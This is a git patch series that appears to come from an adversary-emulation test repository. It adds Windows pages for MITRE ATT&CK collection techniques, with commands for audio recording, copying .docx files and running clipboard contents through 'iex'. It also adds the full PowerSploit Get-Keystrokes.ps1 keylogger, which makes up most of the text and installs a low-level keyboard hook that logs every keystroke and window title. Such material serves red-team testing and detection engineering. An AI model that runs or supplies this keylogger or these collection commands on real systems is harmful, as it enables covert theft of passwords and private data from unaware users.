From 34dd80d94b2f4ab4db7822f422e359d610f157b2 Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Thu, 12 Oct 2017 15:05:28 -0700 Subject: [PATCH 1/3] Initial Commit + Audio Capture + Automated Collection + Input Capture + collection bat + Payload + Updated Matrix --- Windows/Collection/Audio_Capture.md | 13 + Windows/Collection/Automated_Collection.md | 23 ++ Windows/Collection/Input_Capture.md | 13 + Windows/Payloads/Collection.bat | 4 + .../Payloads/Collection/Get-Keystrokes.ps1 | 377 ++++++++++++++++++ Windows/Windows.md | 6 +- 6 files changed, 433 insertions(+), 3 deletions(-) create mode 100644 Windows/Collection/Audio_Capture.md create mode 100644 Windows/Collection/Automated_Collection.md create mode 100644 Windows/Collection/Input_Capture.md create mode 100644 Windows/Payloads/Collection.bat create mode 100644 Windows/Payloads/Collection/Get-Keystrokes.ps1 diff --git a/Windows/Collection/Audio_Capture.md b/Windows/Collection/Audio_Capture.md new file mode 100644 index 00000000..7cbcf534 --- /dev/null +++ b/Windows/Collection/Audio_Capture.md @@ -0,0 +1,13 @@ +# Audio Capture + +MITRE ATT&CK Technique: [T1123](https://attack.mitre.org/wiki/Technique/T1123) + +## cmd.exe + +Create a file called test.wma, with the duration of 30 seconds: + + SoundRecorder /FILE test.wma /DURATION 0000:00:30 + +## PowerShell + +PowerShell Cmdlet - [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) diff --git a/Windows/Collection/Automated_Collection.md b/Windows/Collection/Automated_Collection.md new file mode 100644 index 00000000..879c677e --- /dev/null +++ b/Windows/Collection/Automated_Collection.md @@ -0,0 +1,23 @@ +# Automated Collection + +MITRE ATT&CK Technique: [T1119](https://attack.mitre.org/wiki/Technique/T1119) + +## cmd.exe + +### find: +Input: + + dir c: /b /s .docx | findstr /e .docx + +### copy: +Input: + + for /R c: %f in (*.docx) do copy %f c:\temp\ + +## PowerShell + +Find and copy + +Input: + + powershell Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp} diff --git a/Windows/Collection/Input_Capture.md b/Windows/Collection/Input_Capture.md new file mode 100644 index 00000000..67a26d01 --- /dev/null +++ b/Windows/Collection/Input_Capture.md @@ -0,0 +1,13 @@ +# Input Capture + +MITRE ATT&CK Technique: [T1056](https://attack.mitre.org/wiki/Technique/T1056) + +## PowerShell + +### Get-Keystrokes.ps1 + +[Payload](Payloads/Collection/Get-keystrokes.ps1) provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) + +Input: + + Get-Keystrokes -LogPath C:\key.log diff --git a/Windows/Payloads/Collection.bat b/Windows/Payloads/Collection.bat new file mode 100644 index 00000000..90024da0 --- /dev/null +++ b/Windows/Payloads/Collection.bat @@ -0,0 +1,4 @@ +SoundRecorder /FILE test.wma /DURATION 0000:00:30 +echo Get-Process > process-information.txt +powershell +Get-Clipboard | iex diff --git a/Windows/Payloads/Collection/Get-Keystrokes.ps1 b/Windows/Payloads/Collection/Get-Keystrokes.ps1 new file mode 100644 index 00000000..03ba72c1 --- /dev/null +++ b/Windows/Payloads/Collection/Get-Keystrokes.ps1 @@ -0,0 +1,377 @@ +function Get-Keystrokes { +<# +.SYNOPSIS + + Logs keys pressed, time and the active window. + + PowerSploit Function: Get-Keystrokes + Original Authors: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation) + Revised By: Jesse Davis (@secabstraction) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.PARAMETER LogPath + + Specifies the path where pressed key details will be logged. By default, keystrokes are logged to %TEMP%\key.log. + +.PARAMETER Timeout + + Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely. + +.PARAMETER PassThru + + Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes. + +.EXAMPLE + + Get-Keystrokes -LogPath C:\key.log + +.EXAMPLE + + Get-Keystrokes -Timeout 20 + +.LINK + + http://www.obscuresec.com/ + http://www.exploit-monday.com/ + https://github.com/secabstraction +#> + [CmdletBinding()] + Param ( + [Parameter(Position = 0)] + [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container})] + [String]$LogPath = "$($env:TEMP)\key.log", + + [Parameter(Position = 1)] + [Double]$Timeout, + + [Parameter()] + [Switch]$PassThru + ) + + $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath) + + try { '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode } + catch { throw $_ } + + $Script = { + Param ( + [Parameter(Position = 0)] + [String]$LogPath, + + [Parameter(Position = 1)] + [Double]$Timeout + ) + + function local:Get-DelegateType { + Param ( + [OutputType([Type])] + + [Parameter( Position = 0)] + [Type[]] + $Parameters = (New-Object Type[](0)), + + [Parameter( Position = 1 )] + [Type] + $ReturnType = [Void] + ) + + $Domain = [AppDomain]::CurrentDomain + $DynAssembly = New-Object Reflection.AssemblyName('ReflectedDelegate') + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) + $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) + $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') + $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) + $MethodBuilder.SetImplementationFlags('Runtime, Managed') + + $TypeBuilder.CreateType() + } + function local:Get-ProcAddress { + Param ( + [OutputType([IntPtr])] + + [Parameter( Position = 0, Mandatory = $True )] + [String] + $Module, + + [Parameter( Position = 1, Mandatory = $True )] + [String] + $Procedure + ) + + # Get a reference to System.dll in the GAC + $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | + Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } + $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') + # Get a reference to the GetModuleHandle and GetProcAddress methods + $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') + $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') + # Get a handle to the module specified + $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) + $tmpPtr = New-Object IntPtr + $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) + + # Return the address of the function + $GetProcAddress.Invoke($null, @([Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) + } + + #region Imports + + [void][Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') + + # SetWindowsHookEx + $SetWindowsHookExAddr = Get-ProcAddress user32.dll SetWindowsHookExA + $SetWindowsHookExDelegate = Get-DelegateType @([Int32], [MulticastDelegate], [IntPtr], [Int32]) ([IntPtr]) + $SetWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetWindowsHookExAddr, $SetWindowsHookExDelegate) + + # CallNextHookEx + $CallNextHookExAddr = Get-ProcAddress user32.dll CallNextHookEx + $CallNextHookExDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr], [IntPtr]) ([IntPtr]) + $CallNextHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CallNextHookExAddr, $CallNextHookExDelegate) + + # UnhookWindowsHookEx + $UnhookWindowsHookExAddr = Get-ProcAddress user32.dll UnhookWindowsHookEx + $UnhookWindowsHookExDelegate = Get-DelegateType @([IntPtr]) ([Void]) + $UnhookWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UnhookWindowsHookExAddr, $UnhookWindowsHookExDelegate) + + # PeekMessage + $PeekMessageAddr = Get-ProcAddress user32.dll PeekMessageA + $PeekMessageDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32]) ([Void]) + $PeekMessage = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PeekMessageAddr, $PeekMessageDelegate) + + # GetAsyncKeyState + $GetAsyncKeyStateAddr = Get-ProcAddress user32.dll GetAsyncKeyState + $GetAsyncKeyStateDelegate = Get-DelegateType @([Windows.Forms.Keys]) ([Int16]) + $GetAsyncKeyState = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAsyncKeyStateAddr, $GetAsyncKeyStateDelegate) + + # GetForegroundWindow + $GetForegroundWindowAddr = Get-ProcAddress user32.dll GetForegroundWindow + $GetForegroundWindowDelegate = Get-DelegateType @() ([IntPtr]) + $GetForegroundWindow = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetForegroundWindowAddr, $GetForegroundWindowDelegate) + + # GetWindowText + $GetWindowTextAddr = Get-ProcAddress user32.dll GetWindowTextA + $GetWindowTextDelegate = Get-DelegateType @([IntPtr], [Text.StringBuilder], [Int32]) ([Void]) + $GetWindowText = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetWindowTextAddr, $GetWindowTextDelegate) + + # GetModuleHandle + $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA + $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr]) + $GetModuleHandle = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate) + + #endregion Imports + + $CallbackScript = { + Param ( + [Parameter()] + [Int32]$Code, + + [Parameter()] + [IntPtr]$wParam, + + [Parameter()] + [IntPtr]$lParam + ) + + $Keys = [Windows.Forms.Keys] + + $MsgType = $wParam.ToInt32() + + # Process WM_KEYDOWN & WM_SYSKEYDOWN messages + if ($Code -ge 0 -and ($MsgType -eq 0x100 -or $MsgType -eq 0x104)) { + + $hWindow = $GetForegroundWindow.Invoke() + + $ShiftState = $GetAsyncKeyState.Invoke($Keys::ShiftKey) + if (($ShiftState -band 0x8000) -eq 0x8000) { $Shift = $true } + else { $Shift = $false } + + $Caps = [Console]::CapsLock + + # Read virtual-key from buffer + $vKey = [Windows.Forms.Keys][Runtime.InteropServices.Marshal]::ReadInt32($lParam) + + # Parse virtual-key + if ($vKey -gt 64 -and $vKey -lt 91) { # Alphabet characters + if ($Shift -xor $Caps) { $Key = $vKey.ToString() } + else { $Key = $vKey.ToString().ToLower() } + } + elseif ($vKey -ge 96 -and $vKey -le 111) { # Number pad characters + switch ($vKey.value__) { + 96 { $Key = '0' } + 97 { $Key = '1' } + 98 { $Key = '2' } + 99 { $Key = '3' } + 100 { $Key = '4' } + 101 { $Key = '5' } + 102 { $Key = '6' } + 103 { $Key = '7' } + 104 { $Key = '8' } + 105 { $Key = '9' } + 106 { $Key = "*" } + 107 { $Key = "+" } + 108 { $Key = "|" } + 109 { $Key = "-" } + 110 { $Key = "." } + 111 { $Key = "/" } + } + } + elseif (($vKey -ge 48 -and $vKey -le 57) -or ($vKey -ge 186 -and $vKey -le 192) -or ($vKey -ge 219 -and $vKey -le 222)) { + if ($Shift) { + switch ($vKey.value__) { # Shiftable characters + 48 { $Key = ')' } + 49 { $Key = '!' } + 50 { $Key = '@' } + 51 { $Key = '#' } + 52 { $Key = '$' } + 53 { $Key = '%' } + 54 { $Key = '^' } + 55 { $Key = '&' } + 56 { $Key = '*' } + 57 { $Key = '(' } + 186 { $Key = ':' } + 187 { $Key = '+' } + 188 { $Key = '<' } + 189 { $Key = '_' } + 190 { $Key = '>' } + 191 { $Key = '?' } + 192 { $Key = '~' } + 219 { $Key = '{' } + 220 { $Key = '|' } + 221 { $Key = '}' } + 222 { $Key = '' } + } + } + else { + switch ($vKey.value__) { + 48 { $Key = '0' } + 49 { $Key = '1' } + 50 { $Key = '2' } + 51 { $Key = '3' } + 52 { $Key = '4' } + 53 { $Key = '5' } + 54 { $Key = '6' } + 55 { $Key = '7' } + 56 { $Key = '8' } + 57 { $Key = '9' } + 186 { $Key = ';' } + 187 { $Key = '=' } + 188 { $Key = ',' } + 189 { $Key = '-' } + 190 { $Key = '.' } + 191 { $Key = '/' } + 192 { $Key = '`' } + 219 { $Key = '[' } + 220 { $Key = '\' } + 221 { $Key = ']' } + 222 { $Key = '' } + } + } + } + else { + switch ($vKey) { + $Keys::F1 { $Key = '' } + $Keys::F2 { $Key = '' } + $Keys::F3 { $Key = '' } + $Keys::F4 { $Key = '' } + $Keys::F5 { $Key = '' } + $Keys::F6 { $Key = '' } + $Keys::F7 { $Key = '' } + $Keys::F8 { $Key = '' } + $Keys::F9 { $Key = '' } + $Keys::F10 { $Key = '' } + $Keys::F11 { $Key = '' } + $Keys::F12 { $Key = '' } + + $Keys::Snapshot { $Key = '' } + $Keys::Scroll { $Key = '' } + $Keys::Pause { $Key = '' } + $Keys::Insert { $Key = '' } + $Keys::Home { $Key = '' } + $Keys::Delete { $Key = '' } + $Keys::End { $Key = '' } + $Keys::Prior { $Key = '' } + $Keys::Next { $Key = '' } + $Keys::Escape { $Key = '' } + $Keys::NumLock { $Key = '' } + $Keys::Capital { $Key = '' } + $Keys::Tab { $Key = '' } + $Keys::Back { $Key = '' } + $Keys::Enter { $Key = '' } + $Keys::Space { $Key = '< >' } + $Keys::Left { $Key = '' } + $Keys::Up { $Key = '' } + $Keys::Right { $Key = '' } + $Keys::Down { $Key = '' } + $Keys::LMenu { $Key = '' } + $Keys::RMenu { $Key = '' } + $Keys::LWin { $Key = '' } + $Keys::RWin { $Key = '' } + $Keys::LShiftKey { $Key = '' } + $Keys::RShiftKey { $Key = '' } + $Keys::LControlKey { $Key = '' } + $Keys::RControlKey { $Key = '' } + } + } + + # Get foreground window's title + $Title = New-Object Text.Stringbuilder 256 + $GetWindowText.Invoke($hWindow, $Title, $Title.Capacity) + + # Define object properties + $Props = @{ + Key = $Key + Time = [DateTime]::Now + Window = $Title.ToString() + } + + $obj = New-Object psobject -Property $Props + + # Stupid hack since Export-CSV doesn't have an append switch in PSv2 + $CSVEntry = ($obj | Select-Object Key,Window,Time | ConvertTo-Csv -NoTypeInformation)[1] + + #return results + Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode + } + return $CallNextHookEx.Invoke([IntPtr]::Zero, $Code, $wParam, $lParam) + } + + # Cast scriptblock as LowLevelKeyboardProc callback + $Delegate = Get-DelegateType @([Int32], [IntPtr], [IntPtr]) ([IntPtr]) + $Callback = $CallbackScript -as $Delegate + + # Get handle to PowerShell for hook + $PoshModule = (Get-Process -Id $PID).MainModule.ModuleName + $ModuleHandle = $GetModuleHandle.Invoke($PoshModule) + + # Set WM_KEYBOARD_LL hook + $Hook = $SetWindowsHookEx.Invoke(0xD, $Callback, $ModuleHandle, 0) + + $Stopwatch = [Diagnostics.Stopwatch]::StartNew() + + while ($true) { + if ($PSBoundParameters.Timeout -and ($Stopwatch.Elapsed.TotalMinutes -gt $Timeout)) { break } + $PeekMessage.Invoke([IntPtr]::Zero, [IntPtr]::Zero, 0x100, 0x109, 0) + Start-Sleep -Milliseconds 10 + } + + $Stopwatch.Stop() + + # Remove the hook + $UnhookWindowsHookEx.Invoke($Hook) + } + + # Setup KeyLogger's runspace + $PowerShell = [PowerShell]::Create() + [void]$PowerShell.AddScript($Script) + [void]$PowerShell.AddArgument($LogPath) + if ($PSBoundParameters.Timeout) { [void]$PowerShell.AddArgument($Timeout) } + + # Start KeyLogger + [void]$PowerShell.BeginInvoke() + + if ($PassThru.IsPresent) { return $PowerShell } +} diff --git a/Windows/Windows.md b/Windows/Windows.md index 28e4348f..e3cccfc9 100644 --- a/Windows/Windows.md +++ b/Windows/Windows.md @@ -2,13 +2,13 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| -| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | -| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | [Automated Collection](Collection/Automated_Collection.md) | Data Compressed | Communication Through Removable Media | | [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | Clipboard Data | Data Encrypted | Connection Proxy | | Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | | Bootkit | Bypass User Account Control | Component Firmware | Credentials in Files | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Input Capture | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | +| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Input Capture](Collection/Input_Capture.md) | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | | Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels | | DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query%20Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels | | External Remote Services | Local Port Monitor | Deobfuscate/Decode Files or Information | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote%20System%20Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication | From 3c17d14b37492b68099ae4fc0ec7e9325b4a237e Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Mon, 16 Oct 2017 13:19:20 -0700 Subject: [PATCH 2/3] Fixed Clipboard + Missing clip and made it completely compatible with powershell only now. No need to be in cmd.exe to start this. --- Windows/Collection/Clipboard_Data.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Windows/Collection/Clipboard_Data.md b/Windows/Collection/Clipboard_Data.md index 1077bc49..06368836 100644 --- a/Windows/Collection/Clipboard_Data.md +++ b/Windows/Collection/Clipboard_Data.md @@ -11,6 +11,5 @@ MITRE ATT&CK Technique: [T1115](https://attack.mitre.org/wiki/Technique/T1115) ## PowerShell - echo Get-Process > things.txt - powershell + echo Get-Process | clip Get-Clipboard | iex From cf3f201c940a8521c318b1f045b8d4226ac69331 Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 17 Oct 2017 11:55:57 -0700 Subject: [PATCH 3/3] Fix + Line breaks --- Windows/Collection/Automated_Collection.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Windows/Collection/Automated_Collection.md b/Windows/Collection/Automated_Collection.md index 879c677e..6f377dc8 100644 --- a/Windows/Collection/Automated_Collection.md +++ b/Windows/Collection/Automated_Collection.md @@ -5,11 +5,13 @@ MITRE ATT&CK Technique: [T1119](https://attack.mitre.org/wiki/Technique/T1119) ## cmd.exe ### find: + Input: dir c: /b /s .docx | findstr /e .docx ### copy: + Input: for /R c: %f in (*.docx) do copy %f c:\temp\